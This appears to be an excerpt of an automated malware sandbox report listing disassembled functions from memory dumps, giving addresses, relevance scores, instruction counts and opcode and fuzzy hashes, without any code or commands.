                        Memory Dump Source
                        • Source File: 0000000A.00000002.1845670378.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_7ffd9bac0000_7fGdoA6Inq.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 0c30c93757f86e613686a3991016804b8fc6b09a265aa82c95ac9fa11d05565f
                        • Instruction ID: 6c51f89490d59a684b06eaad255adfc64ae3a9411db8bc24ce41fddf2d145f12
                        • Opcode Fuzzy Hash: 0c30c93757f86e613686a3991016804b8fc6b09a265aa82c95ac9fa11d05565f
                        • Instruction Fuzzy Hash: 71D14C71E1965D8FDBA8EF58C8A4BBCB7A1FF68304F4441B9E01D972D2DA746981CB00
                        Function 00007FFD9BAC3530 Relevance: .3, Instructions: 326COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 0000000A.00000002.1845670378.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_7ffd9bac0000_7fGdoA6Inq.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 186c991e47306e4d362db839a40459ee8917614146aa535fa71145d2a97cb43f
                        • Instruction ID: 226c6f837a1be67090bccab855fb35867ec7ba993206d58e28d21ab2bfdbca11
                        • Opcode Fuzzy Hash: 186c991e47306e4d362db839a40459ee8917614146aa535fa71145d2a97cb43f
                        • Instruction Fuzzy Hash: 94C14870E1A65D8FDB68EFA8C861ABDB7F1FF19305F100179D009A72A1CB79A941CB41
                        Function 00007FFD9BAC4205 Relevance: .3, Instructions: 294COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 0000000A.00000002.1845670378.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_7ffd9bac0000_7fGdoA6Inq.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: a891451a55d565cd6d262746f1b25e908c0afa953872c6bb47e17412cda1b13c
                        • Instruction ID: 29ae0d4b4743536ce04c0e01eb88a36e1046ad52023cb13f66901208941da45a
                        • Opcode Fuzzy Hash: a891451a55d565cd6d262746f1b25e908c0afa953872c6bb47e17412cda1b13c
                        • Instruction Fuzzy Hash: 57B1FB70E0895D8FDB94EF68C895BA8B7F1FF58310F1005A9E05DE72A6DA34A981CF41
                        Function 00007FFD9BAC0CB1 Relevance: .3, Instructions: 251COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 0000000A.00000002.1845670378.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_7ffd9bac0000_7fGdoA6Inq.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: b03bf8da0f7f83e8a338864bbb9121a6ef44478b93ec3b76a9934575c4da68ab
                        • Instruction ID: 95eabfab5e5e91c80e28bbb853379c5992fcdf4ae65f0880c766cbe9ee1dcaf6
                        • Opcode Fuzzy Hash: b03bf8da0f7f83e8a338864bbb9121a6ef44478b93ec3b76a9934575c4da68ab
                        • Instruction Fuzzy Hash: 28A17170E1591D8FDBA5EF18C8A5AE9B7B1FF58305F5001E5A00DE72A5CA34AE81CF40
                        Function 00007FFD9BAC09D9 Relevance: .2, Instructions: 250COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 0000000A.00000002.1845670378.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_7ffd9bac0000_7fGdoA6Inq.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: aa9924c29d8404ec8eae1818338988819f9be574e0464ed0afd70c4a9ac5fbc7
                        • Instruction ID: 3acbefd8ddea68f1a9b690b6716d1fa88e1c1745aaec13e6a661218d537b5524
                        • Opcode Fuzzy Hash: aa9924c29d8404ec8eae1818338988819f9be574e0464ed0afd70c4a9ac5fbc7
                        • Instruction Fuzzy Hash: 5091A770E1895D8FDB94FF68C8A5BA8B7B1FF58304F5045A5E00DE72A6DA34A981CF01
                        Function 00007FFD9BAC1289 Relevance: .2, Instructions: 165COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 0000000A.00000002.1845670378.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_7ffd9bac0000_7fGdoA6Inq.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 33d892697ae6c6b58c95eb472a1844ee113d3090440c7d998d75a2d69f955f70
                        • Instruction ID: 61cd9595d4aad6cfa56cdd20f01f6a0c9b50365fae016bb07a1bf450f3cf9d30
                        • Opcode Fuzzy Hash: 33d892697ae6c6b58c95eb472a1844ee113d3090440c7d998d75a2d69f955f70
                        • Instruction Fuzzy Hash: B6513D75E19A5D8FDB94EF98C465AFCB7B1FF69300F410169E00DE7292CA64A9418B40
                        Function 00007FFD9BAC6051 Relevance: .1, Instructions: 144COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 0000000A.00000002.1845670378.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_7ffd9bac0000_7fGdoA6Inq.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 2d63957034b21ffef309e8b8bfa4e8303190f043da230a656677c57835e18193
                        • Instruction ID: 49288bc41805aeef08f6464ab20927e95b5abcc870a9a8c4ec80b389d3ccdecb
                        • Opcode Fuzzy Hash: 2d63957034b21ffef309e8b8bfa4e8303190f043da230a656677c57835e18193
                        • Instruction Fuzzy Hash: FF416A30E0965D8FDB94EFA8C864AFDB7F0EF59311F00017AE009E32A6CA785A41CB50
                        Function 00007FFD9BAC0FDA Relevance: .1, Instructions: 137COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 0000000A.00000002.1845670378.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_7ffd9bac0000_7fGdoA6Inq.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 9f1603499998d8b795c6e22ff391f2c3089865f867d28d7f68ec969a6cee32e8
                        • Instruction ID: 155761954ef1f5c0e39d2699b22e04c9c31d85e73053d98164e0ba621a9ed0d8
                        • Opcode Fuzzy Hash: 9f1603499998d8b795c6e22ff391f2c3089865f867d28d7f68ec969a6cee32e8
                        • Instruction Fuzzy Hash: 74413B70E1965D8FDB94EFA8C4A4AACBBF1FF59304F400179D009E72A5CB78A941CB00
                        Function 00007FFD9BAC4EF9 Relevance: .1, Instructions: 126COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 0000000A.00000002.1845670378.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_7ffd9bac0000_7fGdoA6Inq.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 42f3954c78102ab1c876b3c503df66cbe22cd1f03f3c615be0abd163691dc051
                        • Instruction ID: ac624db7a9def3150e779419cc9e53aa4be977e6bc6995f771a1a2f59d378cbe
                        • Opcode Fuzzy Hash: 42f3954c78102ab1c876b3c503df66cbe22cd1f03f3c615be0abd163691dc051
                        • Instruction Fuzzy Hash: 1E413970E1464D8FEB84EFA8C8A5AECBBF1FF18311F0441B9E018E7296DA346941CB41
                        Function 00007FFD9BAC1162 Relevance: .1, Instructions: 107COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 0000000A.00000002.1845670378.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_7ffd9bac0000_7fGdoA6Inq.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 6e32fecefe5457d519beeff2426a88595d0417660cc83ff07d650d2d6227e383
                        • Instruction ID: 53a44aa1cf3e31f1185d380a88745a7e181ab47e317aa5063c97f1e7fbe27069
                        • Opcode Fuzzy Hash: 6e32fecefe5457d519beeff2426a88595d0417660cc83ff07d650d2d6227e383
                        • Instruction Fuzzy Hash: 86314C71E0964E8FDB55EFA4C8606EDBBF1FF59310F1001AAE019E3291CA789941CB90
                        Function 00007FFD9BAC4DCD Relevance: .1, Instructions: 103COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 0000000A.00000002.1845670378.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_7ffd9bac0000_7fGdoA6Inq.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 6cf353bd80808bb17f8882aa61a9ac7d38e60623f711d750a643d348114290ea
                        • Instruction ID: 4189d73079a05a249b52a351bd0b7583a867a2b7706af1c2ee10ff1da3557662
                        • Opcode Fuzzy Hash: 6cf353bd80808bb17f8882aa61a9ac7d38e60623f711d750a643d348114290ea
                        • Instruction Fuzzy Hash: FC414C30E19A1D8FEB54EF98C865AEDBBB1FF58315F050179E008E72A6CE746941CB41
                        Function 00007FFD9BAC5F71 Relevance: .1, Instructions: 59COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 0000000A.00000002.1845670378.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_7ffd9bac0000_7fGdoA6Inq.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: c1a67e7d5f32046b52c2646ccce81afea32ff0f449a7ccce4ea17a07d3a9742e
                        • Instruction ID: 9382b43ff7864e73eece16bc584185b410529d31886a5a75e51e5b877c3debd3
                        • Opcode Fuzzy Hash: c1a67e7d5f32046b52c2646ccce81afea32ff0f449a7ccce4ea17a07d3a9742e
                        • Instruction Fuzzy Hash: DA01D63190F78D8FDB52ABA4CC25AEA7FF0EF46310F0501A6E189C71A2CA685559C791
                        Function 00007FFD9BAC5054 Relevance: .0, Instructions: 49COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 0000000A.00000002.1845670378.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_7ffd9bac0000_7fGdoA6Inq.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 8b0e11cd873d72ae42c51f1203352cabb32b05c66fbc36ae42d15569f832a2c9
                        • Instruction ID: 6526781b03dc3f622d0611afb241b29964c422842cd22d85c42adfcefa59eb58
                        • Opcode Fuzzy Hash: 8b0e11cd873d72ae42c51f1203352cabb32b05c66fbc36ae42d15569f832a2c9
                        • Instruction Fuzzy Hash: AD119270E1491C8FDBA4EB68D855BECB7B1FF58201F4041AAD40DE32A6DE346D81CB00
                        Function 00007FFD9BAC5317 Relevance: .0, Instructions: 46COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 0000000A.00000002.1845670378.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_7ffd9bac0000_7fGdoA6Inq.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: db5c9a3cbb2ffde12230afaf403e117b833dcaa29194c0342035aa5ecc7122d3
                        • Instruction ID: 2113dd16e7de5dc703a43727b1cef5a6ae0519d21f5c2b9618ae4a9531cec9d0
                        • Opcode Fuzzy Hash: db5c9a3cbb2ffde12230afaf403e117b833dcaa29194c0342035aa5ecc7122d3
                        • Instruction Fuzzy Hash: 74017C31E0991D8EDFA4EB6898667FDB3B1FF58200F5000BAD04CE3252CE741A858B01
                        Function 00007FFD9BAC08B1 Relevance: .0, Instructions: 31COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 0000000A.00000002.1845670378.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_7ffd9bac0000_7fGdoA6Inq.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 4dba0b6c62e1a8de695f5f50b46deebcb58a296354ed17f8031b0145ae539c3a
                        • Instruction ID: 920a703428b3e3c585ab926799eed8bffdf9623d3d15064dcf2ecf1a36d33ecb
                        • Opcode Fuzzy Hash: 4dba0b6c62e1a8de695f5f50b46deebcb58a296354ed17f8031b0145ae539c3a
                        • Instruction Fuzzy Hash: 96E0923294F28D4BE7317B608A661F97B20FF42700F8755F6D05C460E3DE9866588346

                        Executed Functions

                        Function 00007FFD9BAC2010 Relevance: 15.3, Strings: 11, Instructions: 1544COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 0000000C.00000002.1913993245.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_12_2_7ffd9bac0000_QtLimbtNymPOHuXh.jbxd
                        Similarity
                        • API ID:
                        • String ID: "$[$[$\$]$]$u${${$}$}
                        • API String ID: 0-3490533229
                        • Opcode ID: 5bf3016ff4cc811076b9daa7408ab5d197b424c486cc2740bcd0abe4a33db6bb
                        • Instruction ID: c1784cdb91f0fee8a606267799aee5998da14dd06bb48d6c36c31a27d0c891f4
                        • Opcode Fuzzy Hash: 5bf3016ff4cc811076b9daa7408ab5d197b424c486cc2740bcd0abe4a33db6bb
                        • Instruction Fuzzy Hash: 7FD2C570E0962D8FDBA8EF18C895BA9B7B1FF59301F5041E9D01DE7295CA74AA81CF40
                        Function 00007FFD9BACD804 Relevance: 1.1, Instructions: 1088COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 0000000C.00000002.1913993245.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_12_2_7ffd9bac0000_QtLimbtNymPOHuXh.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 88e1d8bf2441e0e56941a2d7457c2beb90a3e2f68a83a40e8a3f95056ee4b8b2
                        • Instruction ID: 72432dc1c781789f1c6180c5941e3c136f170ac0cbf4644662c202576b876df1
                        • Opcode Fuzzy Hash: 88e1d8bf2441e0e56941a2d7457c2beb90a3e2f68a83a40e8a3f95056ee4b8b2
                        • Instruction Fuzzy Hash: CD72E720F0994A4BE7A8FBB884757B962D2EF98305F4145B8E15EC72EBCD68BD418341
                        Function 00007FFD9BAC0600 Relevance: 7.0, Strings: 5, Instructions: 777COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 0000000C.00000002.1913993245.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_12_2_7ffd9bac0000_QtLimbtNymPOHuXh.jbxd
                        Similarity
                        • API ID:
                        • String ID: "$"$-$[${
                        • API String ID: 0-3019564589
                        • Opcode ID: 6358eb36d176f474ae6b48e7a1a908514be83b9884f0325a0fa77af293bd5eb4
                        • Instruction ID: c5b2c2e6ed83c9799b26fe674c9f79e404c1612f89ab767a332292f58a20f514
                        • Opcode Fuzzy Hash: 6358eb36d176f474ae6b48e7a1a908514be83b9884f0325a0fa77af293bd5eb4
                        • Instruction Fuzzy Hash: 3262E870E0866D8FDBA4EF68C895BA9B7F1FF58301F5005A9D04DE7295CA349A81CF40
                        Function 00007FFD9BAC8E2C Relevance: 2.7, Strings: 1, Instructions: 1448COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 0000000C.00000002.1913993245.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_12_2_7ffd9bac0000_QtLimbtNymPOHuXh.jbxd
                        Similarity
                        • API ID:
                        • String ID: #S}
                        • API String ID: 0-2721051066
                        • Opcode ID: aa8607ea9d4d8ee427226314e68c31e5a1c57d5887875a39af24964a477573dc
                        • Instruction ID: cef1fee5837291fa37233e8d3f00d271f09166013f3003a328854e73910c19cd
                        • Opcode Fuzzy Hash: aa8607ea9d4d8ee427226314e68c31e5a1c57d5887875a39af24964a477573dc
                        • Instruction Fuzzy Hash: D0C29570A1992D8FDBA4EF58C895BA8B7B1FF59305F5001E9D00DE72A5CA74AE81CF40
                        Function 00007FFD9BACFFEC Relevance: 2.6, Strings: 2, Instructions: 72COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 0000000C.00000002.1913993245.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_12_2_7ffd9bac0000_QtLimbtNymPOHuXh.jbxd
                        Similarity
                        • API ID:
                        • String ID: $$L_H
                        • API String ID: 0-2447108517
                        • Opcode ID: 98de5ec78b8699313ae1a68eee780100644851e48eb2ffbf875e282836a273b1
                        • Instruction ID: ae4cbd0f54337606aab9de8f6aed80d96ffc69af8c5a10efdea90eae4b716038
                        • Opcode Fuzzy Hash: 98de5ec78b8699313ae1a68eee780100644851e48eb2ffbf875e282836a273b1
                        • Instruction Fuzzy Hash: E321AF31E1550DAFDB68EF94D8719EDB7B1FF98700F0045B9E019D7296CA756A02CB40
                        Function 00007FFD9BACBF05 Relevance: 1.5, Strings: 1, Instructions: 281COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 0000000C.00000002.1913993245.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_12_2_7ffd9bac0000_QtLimbtNymPOHuXh.jbxd
                        Similarity
                        • API ID:
                        • String ID: dL_H
                        • API String ID: 0-2846114773
                        • Opcode ID: 5f8ddeb066d71d87e5e93e342a84a124794ec7e20d7190007b2fc5c1977f53eb
                        • Instruction ID: 195ad5cba8e78b10300965b8f0371e67415bfa38d40cc5858adab9d355935a2c
                        • Opcode Fuzzy Hash: 5f8ddeb066d71d87e5e93e342a84a124794ec7e20d7190007b2fc5c1977f53eb
                        • Instruction Fuzzy Hash: E3A1C530609B494FE765EB69C0A0676B7E1FF54300F95457EC08EC7AA2DA79F9428B40
                        Function 00007FFD9BACF3EC Relevance: 1.4, Strings: 1, Instructions: 173COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 0000000C.00000002.1913993245.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_12_2_7ffd9bac0000_QtLimbtNymPOHuXh.jbxd
                        Similarity
                        • API ID:
                        • String ID: 0L_H
                        • API String ID: 0-3989560096
                        • Opcode ID: 5ef6c73415fc6d819869aa6ecd8dd5c8c28f1ed4241d4a6bb9f7d6452ab56482
                        • Instruction ID: 27e15b43e8d67188aded3672f20a8abdac9b936bdd75c12960696e3d79a3f275
                        • Opcode Fuzzy Hash: 5ef6c73415fc6d819869aa6ecd8dd5c8c28f1ed4241d4a6bb9f7d6452ab56482
                        • Instruction Fuzzy Hash: C4516B32B0EA0A4BE738AB68A4A51B577D0EF44310B05067ED44FC3292DF6ABD468391
                        Function 00007FFD9BACC30C Relevance: 1.3, Strings: 1, Instructions: 76COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 0000000C.00000002.1913993245.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_12_2_7ffd9bac0000_QtLimbtNymPOHuXh.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID: 0-3916222277
                        • Opcode ID: 80fdefdec98d98fefa062d6929114bc30ce07b8e9bc3ab6f28d05a6062a56029
                        • Instruction ID: f34e8654b61f78eb42827c835a4762f8ce0965aff558c4a4db638c4ba2b778f5
                        • Opcode Fuzzy Hash: 80fdefdec98d98fefa062d6929114bc30ce07b8e9bc3ab6f28d05a6062a56029
                        • Instruction Fuzzy Hash: EB21A131E1950D9FDB58EB98D8619FDB7B1FF58304F0041B9E019D7396DA796902CB40
                        Function 00007FFD9BAD018E Relevance: .4, Instructions: 385COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 0000000C.00000002.1913993245.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_12_2_7ffd9bac0000_QtLimbtNymPOHuXh.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 1398a33b93ffb2ed2be6ef0c5a43138fd24863fd44c2165172733879c4f46344
                        • Instruction ID: 0b2a1cb2bb4d1359e893ea93618afe4268e09a6b7dfc05cda7613e6f6f15895e
                        • Opcode Fuzzy Hash: 1398a33b93ffb2ed2be6ef0c5a43138fd24863fd44c2165172733879c4f46344
                        • Instruction Fuzzy Hash: 9DB17530A2D65A0BF33C9B6894B15B873D0EB85708F6507BDD4DBC3597D868A943C389
                        Function 00007FFD9BAC1900 Relevance: .4, Instructions: 366COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 0000000C.00000002.1913993245.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_12_2_7ffd9bac0000_QtLimbtNymPOHuXh.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 4527a6aa9d354a69ce9ff9f974fcf9bb139e67310be75f658c678cef6ee077c0
                        • Instruction ID: 17c77e81fabb3a142ae0bda301d81f3897ee7d9268571bb05155bd897052fba7
                        • Opcode Fuzzy Hash: 4527a6aa9d354a69ce9ff9f974fcf9bb139e67310be75f658c678cef6ee077c0
                        • Instruction Fuzzy Hash: 02D13B71E1965D8FDBA8EF58C8A4BBCB7A1FF68304F4041B9E01D972D2DA746981CB01
                        Function 00007FFD9BACDFEB Relevance: .4, Instructions: 358COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 0000000C.00000002.1913993245.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_12_2_7ffd9bac0000_QtLimbtNymPOHuXh.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 0b6b8c91b480e697135335856e4162fb2a64009cb3fde1b58b85c6c0b96481ce
                        • Instruction ID: 1ca6ae9088bdfe1c54921354c597297c76699b1b44c594beace3d3843d63510a
                        • Opcode Fuzzy Hash: 0b6b8c91b480e697135335856e4162fb2a64009cb3fde1b58b85c6c0b96481ce
                        • Instruction Fuzzy Hash: C3D17034B0A55E4AEBA4FB68C8A1BB933A2FF54340F454574D40DD32E6CEA5BE81CB41
                        Function 00007FFD9BAD461C Relevance: .3, Instructions: 345COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 0000000C.00000002.1913993245.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_12_2_7ffd9bac0000_QtLimbtNymPOHuXh.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 550829002961aed402742698c0502fe2e06b6b097c811c88656a77df75d69a79
                        • Instruction ID: fe70751399c1dcdd6571c72a17c5ad8c27f7f7c3f8c691f3a7a53a97394046f7
                        • Opcode Fuzzy Hash: 550829002961aed402742698c0502fe2e06b6b097c811c88656a77df75d69a79
                        • Instruction Fuzzy Hash: F3C15E30A0955D8FDBA4EF68D865BE8B7B1FF59315F4005BAE00DD72A6CE34A981CB40
                        Function 00007FFD9BAC3530 Relevance: .3, Instructions: 326COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 0000000C.00000002.1913993245.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_12_2_7ffd9bac0000_QtLimbtNymPOHuXh.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: a7001eff5041d9ab22c6ce501abef03d397c720eba575756cd61131349415464
                        • Instruction ID: 226c6f837a1be67090bccab855fb35867ec7ba993206d58e28d21ab2bfdbca11
                        • Opcode Fuzzy Hash: a7001eff5041d9ab22c6ce501abef03d397c720eba575756cd61131349415464
                        • Instruction Fuzzy Hash: 94C14870E1A65D8FDB68EFA8C861ABDB7F1FF19305F100179D009A72A1CB79A941CB41
                        Function 00007FFD9BAC4205 Relevance: .3, Instructions: 294COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 0000000C.00000002.1913993245.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_12_2_7ffd9bac0000_QtLimbtNymPOHuXh.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 09aeb7391ac0de4d7726891379572f33d009dbcb66ba871ac2a7669c35ea394f
                        • Instruction ID: 6d4b6f29010644e9dadeedc803baebf0a6b812920fa262e4571714ff9048e621
                        • Opcode Fuzzy Hash: 09aeb7391ac0de4d7726891379572f33d009dbcb66ba871ac2a7669c35ea394f
                        • Instruction Fuzzy Hash: 03B1FB70E0895D8FDB94EF68C895BA9B7F1FF58300F1005A9E05DE72A6DA34A981CF41
                        Function 00007FFD9BACA88D Relevance: .3, Instructions: 291COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 0000000C.00000002.1913993245.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_12_2_7ffd9bac0000_QtLimbtNymPOHuXh.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 13278d27d19713983efc81b1b7fb3903b06994d88df7b5d91959f9d4700ce0fd
                        • Instruction ID: baa165e89f38ad810178094d9e1491850150a0a042dbadcc03c550380d5323c7
                        • Opcode Fuzzy Hash: 13278d27d19713983efc81b1b7fb3903b06994d88df7b5d91959f9d4700ce0fd
                        • Instruction Fuzzy Hash: BCA1C974A09A1C8FDF98EF58C895BA8B7F1FF68305F1101A9D40DE7295CA75AD81CB40
                        Function 00007FFD9BAC5A0D Relevance: .3, Instructions: 283COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 0000000C.00000002.1913993245.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_12_2_7ffd9bac0000_QtLimbtNymPOHuXh.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 2a2ccf28567963b7be654ed13253456a9d4ef722a57374521592267489fcc0e1
                        • Instruction ID: accd207db492bef5a3664b02dc7e6374068a2ec54b6fc1df46033e3aa588d785
                        • Opcode Fuzzy Hash: 2a2ccf28567963b7be654ed13253456a9d4ef722a57374521592267489fcc0e1
                        • Instruction Fuzzy Hash: FFA1B874A09A1D8FDF98EF58C894BA8B7F1FF68305F1001A9E40DE7295CA35A981CB40
                        Function 00007FFD9BACFBF5 Relevance: .3, Instructions: 279COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 0000000C.00000002.1913993245.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_12_2_7ffd9bac0000_QtLimbtNymPOHuXh.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
